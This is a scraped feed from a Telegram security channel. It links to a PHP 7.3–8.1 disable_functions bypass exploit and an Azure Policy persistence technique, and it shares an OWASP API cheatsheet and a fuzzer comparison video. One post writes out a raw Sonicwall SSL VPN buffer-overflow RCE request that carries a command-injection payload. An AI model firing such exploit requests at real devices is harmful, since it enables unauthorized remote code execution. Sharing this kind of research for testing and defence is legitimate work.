Security Analysis – Telegram
Security Analysis
11.5K subscribers
344 photos
50 videos
36 files
885 links
- Offensive Security (Red Teaming / PenTesting)
- BlueTeam (OperationSec, TreatHunting, DFIR)
- Reverse Engineering / Malware Analysis
- Web Security
- Cryptography
- Steganography
- Forensics
Contact : @DrPwner
Download Telegram
⭕️ PHP 7.3-8.1 disable_functions bypass using string concatenation

PHP 7.3-8.1 disable_functions bypass [concat_function]This exploit uses a bug in a function that handles string concatenation.
A statement such as $a.$b might result in memory corruption if certain conditions are met.
The bugreport provides a very thorough analysis of the vulnerability.
The PoC was tested on various php builds for Debian/Ubuntu/CentOS/FreeBSD with cli/fpm/apache2 server APIs and found to work reliably.

https://github.com/mm0r1/exploits/tree/master/php-concat-bypass
#PHP #bypass #disable_functions
@securation
🔥2
⭕️Sonicwall SSL VPN nobody BOF RCE

GET /%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf%64%b8%06%08;{touch,/tmp/lol};%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf%64%b8%06%08;{touch,/tmp/lol};?aaaaaaaa...

@securation
👍5👎3
Forwarded from Deleted Account
Media is too big
VIEW IN TELEGRAM
⭕️ مقایسه دو فازر ffuf و Wfuzz !

کدوم یکی برای فازینگ وب اپلیکیشن ها بهتره و سرعت و عملکرد بهتری داره ؟!
توی این ویدیو نکات جالبی رو ببینید.

#fuzzing #tools #web
@securation
👍7👎2
Forwarded from Deleted Account
OWASP_API_Security_Top_10_Cheatsheet_pdf_1636948037.pdf
1.4 MB
⭕️ OWASP API Security Top 10

#owasp #API
@securation
⭕️ Persistence with Azure Policy Guest Configuration

Use Azure Policy Guest Configuration to gain persistence in your target environment and how to detect such an attack as a defender.

https://cloudbrothers.info/en/azure-persistence-azure-policy-guest-configuration/
#azure
@securation